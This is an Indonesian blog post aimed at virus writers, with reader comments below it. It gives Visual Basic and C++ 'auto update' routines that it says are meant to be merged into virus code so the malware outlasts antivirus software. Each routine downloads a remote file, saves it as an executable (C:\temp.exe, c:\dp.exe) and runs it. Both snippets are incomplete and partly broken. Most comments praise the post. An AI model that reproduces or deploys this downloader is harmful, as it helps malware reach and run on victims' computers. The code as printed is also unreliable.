PerKembangan Virus Lokal Pada Saat Ini Sangat Pesat , Tetapi Nanya sedikiti Virus YAng dpt hanya bertahan lama , hal ini dikarenakan Banyaknya serangan2 AV (Loh AV Yang ngerang TOh :p) Baik Av LOkal Ato Av Luar terhadap Virus 2 Lokal
apalagi Saat ini ada Av Lokal Yang RealTime Protection dan Auto update(Yah makin ancur aja Deh PerVirusan Indonesia) .. :p
Ok Hal tersebut Diharapkan Tdk Membuat Para VXers BErkecil hati ,Pada Artikel ini Saya aKan Memberi Sedikit Contoh Code Auto Update yang sangat Layak Jika Di gabung oleh Code Virus Ya Langsung Ajah
Code Dalam VB
Private Declare Function InternetOpen Lib "wininet.dll" Alias "InternetOpenA" (ByVal lpszAgent As String, ByVal dwAcessType As Long, ByVal lpszProxyName As String, ByVal lpszProxyBypass As String, ByVal dwFlags As Long) As Long
Private Declare Function InternetReadFile Lib "wininet.dll" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal dwNumberOfBytesToRead As Long, ByRef lpNumberOfBytesRead As Long) As Boolean
Private Declare Function InternetOpenUrl Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal address As String, ByVal headers As String, ByVal headlenght As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet.dll" _
(ByVal hInet As Long) As Integer
Dim hInternet As Long
Dim hRequest As Long
Dim strBuffer As String * 1
Public Function Update(Url As String)
hInternet = InternetOpen(App.Title, INTERNET_OPEN_TYPE_DIRECT, vbNullString, vbNullString, 0)
If hInternet <> 0 Then hRequest = InternetOpenUrl(hInternet, Url, vbNullString, 0, INTERNET_FLAG_NO_AUTO_REDIRECT, 0)
If hRequest <> 0 Then
Open "C:\temp.exe" For Binary Access Write As 1
bRes = InternetReadFile(hRequest, strBuffer, Len(strBuffer), lBytesRead)
If lBytesRead > 0 Then
Put #1, , strBuffer
End If
Loop While lBytesRead > 0
Close #1
Shell "C:\temp.exe"
InternetCloseHandle hInternet
End If
End Function
Code Pada C++
#include "urlmon.h"
#include "windows.h"
#define site "http://localhost/vr1.jpg"
#define pathdwn "c:\\dp.exe"
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
HINSTANCE shell32;
urlmon = LoadLibrary("urlmon.dll");
shell32 = LoadLibrary("shell32.dll");
fURLDownload = (DF)GetProcAddress(urlmon,"URLDownloadToFileA");
fShellExecute = (SE)GetProcAddress(shell32,"ShellExecuteA");
fURLDownload = (DF)GetProcAddress(urlmon,"URLDownloadToFileA");
fShellExecute = (SE)GetProcAddress(shell32,"ShellExecuteA");
if(fURLDownload(0,site,pathdwn, 0, 0) == S_OK)
Yah Gitu Aja sih , ....
Pesen gw Diharapkan Tmn2 VXers Tidak Membuat Virus yang Merusak Data , yah Yang Wajar2 aja , klo membuat Virus Hanya Untuk Mengembangkan Diri sih Ok2 Saja
SAya Tidak bertanggung jawab atas Kerusakan Yang terjadi
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ReplyDeleteWew, bisa buat virus ya mas, saya pernah cb bwt virus pake VB jg, tp ga bs. pusing.
ReplyDeleteini gimana toh kok tambah ngajarin bikin virus.
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ReplyDeletenice info.
ReplyDeletemakasih ya atas sharing nya.
bermanfaat banget nih.
wah2.. kembali lagi dgn auto update ny..
ReplyDeleteVery interesting article.
ReplyDeletejahat ya :(
ReplyDeletekren gan info nya sangat berguna untuk saya deh haha
ReplyDeleteinfo nya kren yah,,,, mksih
ReplyDeleteharus di basmi tuh virus nya :D
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